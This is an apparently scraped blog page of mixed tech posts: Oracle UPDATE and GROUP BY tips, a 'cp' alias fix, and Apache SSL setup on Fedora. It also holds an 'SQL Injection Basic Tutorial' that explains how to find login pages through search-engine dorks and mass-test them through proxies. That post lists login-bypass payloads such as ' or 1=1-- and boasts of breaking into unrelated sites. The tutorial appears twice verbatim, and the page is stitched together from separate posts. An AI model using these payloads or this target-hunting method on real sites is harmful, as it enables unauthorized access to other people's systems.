Melakukan Update satu field dengan menggunakan value dari tabel lain pada Oracle sedikit lebih ribet daripada pada Mysql.
Pada Mysql biasanya dapat digunakan sql script sbb :
UPDATE [table_name_1] [alias_1],[table_name_2] [alias_2]
SET [alias_1].[column_name] = [alias_2].[column_name]
WHERE
[condition]
Tetapi pada Oracle hanya bisa dilakukan terhadap satu field saja dengan sql script sbb :
UPDATE [table_name] [alias]
SET ([column_name],[column_name] ) =
SELECT ([column_name], [column_name])
FROM [table_name]
WHERE [alias.column_name] = [alias.column_name]);
Kamis, 18 Desember 2008
Linux Copy Without Overwrite Confirmation
By default, Fedora Core seems to interpret every "cp" command I issue as
"cp
-i"--that is, it asks me if I'm sure whether or not I want to overwrite
umpteen files and I have to hit "y" and Enter a zillion times.
Any suggestions?
Thanks.
Chekc if you have an alias for 'cp'.
Type
$ alias
...
...
alias cp='cp -i'
...
...
And do
$ unalias cp
"cp
-i"--that is, it asks me if I'm sure whether or not I want to overwrite
umpteen files and I have to hit "y" and Enter a zillion times.
Any suggestions?
Thanks.
Chekc if you have an alias for 'cp'.
Type
$ alias
...
...
alias cp='cp -i'
...
...
And do
$ unalias cp
Oracle Not A Group By Expresion Error
Problem
When using a GROUP BY clause every field in the SELECT list must be either:- One of the GROUP BY terms - in this case region
- An aggregate function - for example SUM or COUNT
- An expression based on the above
In the example the field name may not be used on the SELECT line.
In a group by line each region shows up only once - however in a typical region such as Africa there are several different name values. WHich one should SQL pick?
Solutions
- Remove the offending field from the SELECT line
- Add the field to the GROUP BY clause
- Aggregate the offending field
SQL Injection Basic Tutorial
One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plent more
now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plent more
now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
Create SSL Cert in Fedora Core 6
Berikut adalah langkah-langkah dalam membuat Security Certificate untuk mengaktifkan HTTPS di Fedora Core 6
1. Open up a command line window and promote yourself to root using su - and type the following:
openssl genrsa -out sslkey.key 2048
This will create a 2048 bit rsa encrypted key. A 1024 bit key is probably plenty, but why not have a little fun and make a ridiculously high level encryption key. The “sslkey.key” is the filename and you can use whatever you want here.
2. Create a self-signed certificate from that key file that Apache will use to create our https session.
openssl req -new -key sslkey.key -x509 -out sslcert.crt
Again, “sslcert.crt” can be whatever you want. Another good name for these would be yourdomainname.crt
3. Do a little directory organization. You’re going to want to place these two files in a place that makes sense
mkdir /etc/httpd/conf/ssl.crt
mkdir /etc/httpd/conf/ssl.key
mv sslkey.key /etc/httpd/conf/ssl.key
mv sslcert.crt /etc/httpd/conf/ssl.crt
Now, I moved on to the second part of this process, which is configuring Apache to use our certificate:
4. Backup httpd.conf and open it to edit using an editor of your choice
cd /etc/httpd/conf
cp httpd.conf httpd.bak
vi httpd.conf
5. Tab to the bottom of the configuration file. Somewhere towards the bottom you’ll see a section about creating Virtualhosts. This is what we need to do for SSL to work correctly. I added the following, changing everything in caps to the settings for my server:
DocumentRoot /var/www/html
ServerName DOMAINNAME
ServerAdmin MYEMAILADDRESS
ErrorLog /var/log/error_log
TransferLog /var/log/access_log
SSLEngine on
SSLCertificateFile /etc/httpd/conf/ssl.crt/sslcert.crt
SSLCertificateKeyFile /etc/httpd/conf/ssl.key/sslkey.key
# SSLCACertificateFile /etc/httpd/conf/ssl.crt/ca-bundle.crt
SSLOptions +StdEnvVars
SSLOptions +StdEnvVars
SetEnvIf User-Agent “.*MSIE.*” nokeepalive ssl-unclean-shutdown
CustomLog /var/log/ssl_request_log \
“%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \”%r\” %b”
I commented out the SSLCACERTIFICATEFILE line as this is really only needed if you have multiple certificate files. It is just a file that would be used to point your clients to all the certificate files that you have. Purely option in this case.
I then issued a “service httpd restart” command to restart Apache. By default mod_ssl should be setup on Fedora Core 6. One way to check is to make sure you have an ssl.conf file in /etc/httpd/conf.d and to look for the line that makes Apache use the module:
cat /etc/httpd/conf.d/ssl.conf | grep mod_ssl.so
This should return:
LoadModule ssl_module modules/mod_ssl.so
Then you’re all set. Test this out by going to your new ssl website! https://yourdomainname
Langganan:
Postingan (Atom)
